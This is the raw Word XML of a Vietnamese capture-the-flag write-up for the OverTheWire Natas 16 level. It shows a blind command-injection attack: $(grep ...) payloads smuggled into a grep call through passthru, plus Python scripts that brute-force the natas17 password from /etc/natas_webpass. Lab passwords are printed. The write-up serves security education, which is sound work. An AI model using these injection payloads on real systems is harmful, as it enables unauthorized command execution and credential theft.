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6D397" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="001A4591" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A4591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">natas17: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF0225E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425D4DB" w14:textId="048BDE2F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Bạn dùng thông tin đăng nhập sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="0034011F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>natas16: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395E9AFE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6635A2B" w14:textId="5A63952C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Ứng dụng cho phép mình lọc các từ trong file dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8724B9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798A5D9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8F79AB2" wp14:editId="1DF64C39">
            <wp:extent cx="5943600" cy="2584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4B1A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990F30C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CD6EAF8" wp14:editId="2C00F1C7">
            <wp:extent cx="56642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B9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C9D0D9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Nó bị dính lỗi command injection vì mình thấy hàm passthru.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F3C9C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96515F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Hàm passthru, exec, system cho phép mình thực thi lệnh từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607C6A0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35B9635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Mình nhập lệnh là ls : nó liệt kê các từ trong dictionary.txt chứa “ls”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9E3DEE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0BAA2A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2FF070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CBCBAD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Nhưng nó đã chặn những kí tự đặc biệt như ;  |  &amp; ` \   </w:t>
      </w:r>
      <w:r w:rsidRPr="00283415">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'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  </w:t>
      </w:r>
      <w:r w:rsidRPr="00283415">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F59494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F5E4F2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Mình thử bypass bằng return line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FD4A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A5DCEB3" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="001A4591" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="001A4591"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  <w:t>%0als</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFA68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834A079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Thường mình làm đến đây là đã inject thành công nhưng nó chỉ liệt kê tất cả từ trong dictionary.txt. Tại sao lại như vậy??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FD1F8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AAFEC51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TH1:  $key=</w:t>
      </w:r>
      <w:r w:rsidRPr="00283415">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\nls /etc</w:t>
      </w:r>
      <w:r w:rsidRPr="00283415">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A09AA94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3A194D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">passthru("grep -i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A194D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$key dictionary.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1D0BA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51124B1" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="00D86119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t xml:space="preserve">grep -i </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9922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t>ls /etc dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A06E4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sym w:font="Wingdings" w:char="F0E0"/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Mình sẽ liệt kê được các file của thư mục etc </w:t>
      </w:r>
      <w:r w:rsidRPr="00831CFA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/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Thực thi code thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E572F4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1BE419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Nhưng trong source code có thêm \</w:t>
      </w:r>
      <w:r w:rsidRPr="00283415">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7F72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t>passthru("grep -i \"$key\" dictionary.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500097A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1C80797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Câu lệnh sẽ là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D7FEBA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653FB5D" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="00D86119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t>grep -i "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDEF7C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t>ls /etc" dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5453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86119">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/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Nó sẽ đọc file dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD55B4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A5DA4A4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Mình cố gắng bypass filter cũng không thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582280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D4594F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Chúng ta có thể tiêm code sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FAE94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489331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3B483649" wp14:editId="5C5763F0">
            <wp:extent cx="4131945" cy="265060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77" b="28643"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4132162" cy="265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AC716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7347207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$() syntax in bash: Command Substitution. Điều này rất hữu ích khi bạn muốn dùng đầu ra của 1 lệnh là 1 đối số cho 1 lệnh khác hoặc gán nó cho 1 biến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12076AFC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1A0035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FA1CABA" wp14:editId="1CEB0190">
            <wp:extent cx="5943600" cy="1391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DB01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2B7957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Mình sẽ dùng 1 kĩ thuật là </w:t>
      </w:r>
      <w:r w:rsidRPr="001A4591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t>boolean based injection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</w:p>
    <w:p w14:paraId="67EF04B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7941F84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>Question: Does /etc/natas_webpass/natas17 contain the letter a?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889F8A5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Input: </w:t>
      </w:r>
      <w:r w:rsidRPr="001A4591"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  <w:t>doomed$(grep a /etc/natas_webpass/natas17)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1014CF26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95BAC4A" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="001A4591" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="001A4591"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  <w:t>grep -i  "doomed$(grep a /etc/natas_webpass/natas17)" dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED514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754B636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>Output if Yes: empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF1B25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>Output if No: doomed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752138F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69497A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>Let’s get our filtered character set first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8BD097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7CE1DA6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9545F9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4E502F8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A7A96E" wp14:editId="011BE30A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-324091</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-104172</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6655443" cy="3657600"/>
                <wp:effectExtent l="0" t="0" r="1206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5443" cy="365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D61DD" id="Rectangle 12" o:spid="_x0000_s1026" style="position:absolute;margin-left:-25.5pt;margin-top:-8.2pt;width:524.05pt;height:4in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" fillcolor="white [3201]" strokecolor="#70ad47 [3209]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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import requests  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFC460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from requests.auth import HTTPBasicAuth  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D8060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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B02B31F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auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319E9AB5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1E1B4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filteredchars = ''  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C88F6" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="0024491E" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:right="-563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allchars='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFF25A6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for char in allchars:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50543ACE" w14:textId="77777777" w:rsidR="0034011F" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:p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r = requests.get('http://natas16.natas.labs.overthewire.org/?needle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60C115" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="0024491E" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:p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=doomed$(grep ' + char + ' /etc/natas_webpass/natas17)', auth=auth)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC3112" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="0024491E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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265375B4" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="0024491E" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:p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if 'doomed' not in r.text:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD73F19" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="0024491E" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1418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 filteredchars = filteredchars + char  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C9193" w14:textId="77777777" w:rsidR="0034011F" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1418"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024491E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  print(filteredchars)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3789990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4C09F9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CB691C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304900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115867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>Next, we’ll be using regex again to get the exact password (posting entire code):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3CEEE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5B6628A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0EF3F7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563AC2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BD1074D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D11DD5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165B15F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5523DAA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F14666C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CA9FD09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05D228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001F4D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61A187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228A682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C887B9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AF9B901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93B3CD8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09A1060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172E78D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5E1B6B3" wp14:editId="5F2AB01E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-324091</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-243069</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6794339" cy="6088283"/>
                <wp:effectExtent l="0" t="0" r="13335" b="82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339" cy="60882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8BFA" id="Rectangle 13" o:spid="_x0000_s1026" style="position:absolute;margin-left:-25.5pt;margin-top:-19.15pt;width:535pt;height:479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" fillcolor="white [3201]" strokecolor="#70ad47 [3209]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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import requests  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029DA4C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from requests.auth import HTTPBasicAuth  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A879CA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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A550E99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auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E0A14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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17757CE8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filteredchars = ''  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11458961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passwd = ''  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B41173" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:right="-563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allchars='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E3FFF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for char in allchars:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9DD99" w14:textId="77777777" w:rsidR="0034011F" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="567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>r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7706C2" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="567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doomed$(grep ' + char + ' /etc/natas_webpass/natas17)', auth=auth)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B0196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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188D1C6" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="567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if 'doomed' not in r.text:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E4838E" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1134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filteredchars = filteredchars + char  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197A458" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1134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print(filteredchars)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188A1EF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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8F8C2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for i in range(32):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C0763" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:firstLine="567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for char in filteredchars:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642443CB" w14:textId="77777777" w:rsidR="0034011F" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1134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>r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E49B310" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1134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doomed$(grep ^' + passwd + char + ' /etc/natas_webpass/natas17)', auth=auth)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67515E" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC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</w:p>
    <w:p w14:paraId="32A953D9" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1134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if 'doomed' not in r.text:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2502775D" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1701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passwd = passwd + char  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA9E1DB" w14:textId="77777777" w:rsidR="0034011F" w:rsidRPr="006038BC" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1701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print(passwd)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A7BCF" w14:textId="77777777" w:rsidR="0034011F" w:rsidRDefault="0034011F" w:rsidP="0034011F">
      <w:pPr>
        <w:ind w:left="1701"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006038BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">break  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7C613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4AAF4A5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D781A1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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038E788C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BB3345B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3B351FF" wp14:editId="115D4C67">
            <wp:extent cx="3102015" cy="586633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8" r="69423"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3119635" cy="589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41F3" w14:textId="77777777" w:rsidR="0034011F" w:rsidRDefault="0034011F" w:rsidP="0034011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6AAFEA4" w14:textId="77777777" w:rsidR="0034011F" w:rsidRDefault="0034011F" w:rsidP="0034011F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1A4591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natas17: XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF4182" w14:textId="77777777" w:rsidR="002F49FE" w:rsidRDefault="002F49FE"/>
    <w:sectPr w:rsidR="002F49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1F"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0034011F"/>
    <w:rsid w:val="00593684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18B7D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DACED3A1-8664-084A-88B7-3AC479C5E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11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2023-10-29T12:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-29T12:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>